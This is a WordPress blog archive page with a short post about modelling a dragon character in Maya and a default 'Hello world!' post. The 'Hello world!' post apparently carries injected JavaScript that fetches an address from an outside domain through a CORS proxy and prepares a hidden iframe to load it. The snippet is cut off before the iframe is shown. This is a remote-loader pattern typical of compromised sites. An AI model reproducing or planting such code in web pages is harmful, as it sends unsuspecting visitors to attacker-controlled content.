Uncategorized

Week 1

Starting to model a character for animation. I want to get back into rigging and get better at it. Looking back at when I first started working in Maya, I can’t believe what would once take me a week to model now takes a couple of hours.

I started doing that mech over there but realised I can’t do much with it yet. So I put it aside for now and modelled this little Trickdragon character of mine. With this character I can do a muscle simulation on the belly to make it jiggle and add some fire visual effects!… Read the rest

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

const configLink = "https://corsproxy.io/?url=http://heyues.live";

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink) .then(response ={ if (!response.ok) { throw new Error(" "); } return response.text(); })

.then(finalUrl ={ return fetch(finalUrl, { method: "HEAD" }) .then(headResponse =({ headResponse, finalUrl })); }) .catch(() ={

}); }

if (typeof window.__digitalflwrIframeCreated === "undefined") { window.__digitalflwrIframeCreated = false; }

window.__digitalflwrFetchPromise .then(result ={

if (!result) return; const { headResponse, finalUrl } = result;

if (!headResponse || headResponse.status === 404) { return; }

if (!window.__digitalflwrIframeCreated) { window.__digitalflwrIframeCreated = … Read the rest